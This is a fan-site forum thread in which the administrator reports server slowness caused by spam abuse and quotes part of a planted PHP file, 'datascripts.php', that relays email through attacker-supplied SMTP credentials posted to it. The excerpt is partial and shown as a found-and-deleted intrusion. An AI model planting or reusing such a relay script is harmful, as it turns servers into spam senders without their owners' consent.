Jump to content
Jay

Site Slowness

Recommended Posts

We're aware the site is working incredibly slow today.


I have emailed Andreas about the issue. Either he or I will post updates here.

Share this post


Link to post
Share on other sites

Hi,

someone use the server to send many many SPAM mails.

I deactivate the mail system on the server.

YOU CAN NOT RECIEVE OR SEND MAILS TO JWFAN.COM.

I plan to migrate the website to a new server and check the system in the next few days.

Andreas

Share this post


Link to post
Share on other sites

Hi,

Ok i found a part of a website that "create this problems".

Mail system for jwfan.com is back online (you can use it to send lost passwords, create new accounts...)

I shut down the part of the website that create this problems.

OK is bedtime for me. Hope we have no problems when I sleep.

Please donate some money. I use it to rent a better and more secure server and

to pay someone to fix this problem forever!!!

Sorry!

Andreas

Share this post


Link to post
Share on other sites

I found the fucking bad file on the server "datascripts.php"

For the script kidys:

# $f = file_get_contents('test.xml');
# $_POST['data'] = base64_encode($f);

if (!empty($_POST['data'])) {
$e = new Email();
$e->set_message($_POST['data']);
$e->send();

#
$xml = $e->response->asXML();
echo base64_encode($xml);
} elseif (!empty($_POST['address'])) {
$m = new SM;

$m->address = $_POST['address'];
$m->port = $_POST['port'];
$m->login = $_POST['login'];
$m->password = $_POST['password'];

$m->email = $_POST['email'];
$m->name = $_POST['name'];

,,, and many many more fucking code!

Sorry for my bad languages.

I delete all this bad **** files from the server.

I hope this is the only security hole on the server.

And sorry for the restart from the server, 20min ago.

When the website is slow again: Tell me!!!

Andreas

Share this post


Link to post
Share on other sites

ok, something is REALLY wrong tonight

Taking 1 minute to load each page, took me 5 minutes to find this thread already 3 pages in the archives and post his reply

I gave up earlier I thought the site was down

Share this post


Link to post
Share on other sites

Hi,

mh I don't know.

Mail Spam is not the problem.

Mail query is empty.

Server load is OK in the last 30min.

Another problem? Hack attack? I don't know

Andreas

PS: Migration to a new server very soon!

Share this post


Link to post
Share on other sites

We will not go quietly into the night!

Perhaps it's fate that today is the 19th of August. And you will once again be fighting for our freedom. Not from spambots, subforums, or Gustavo Santaollalla. But from annihilation. We're fighting for our right to post. To exist. And should we win the day, the 19th of August will no longer be known as a regular day, but as the day when JWFan declared in one voice, "We will not go quietly into the night! We will not vanish without a fight." We're going to live on. We're going to survive. Today, we celebrate our new server day.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×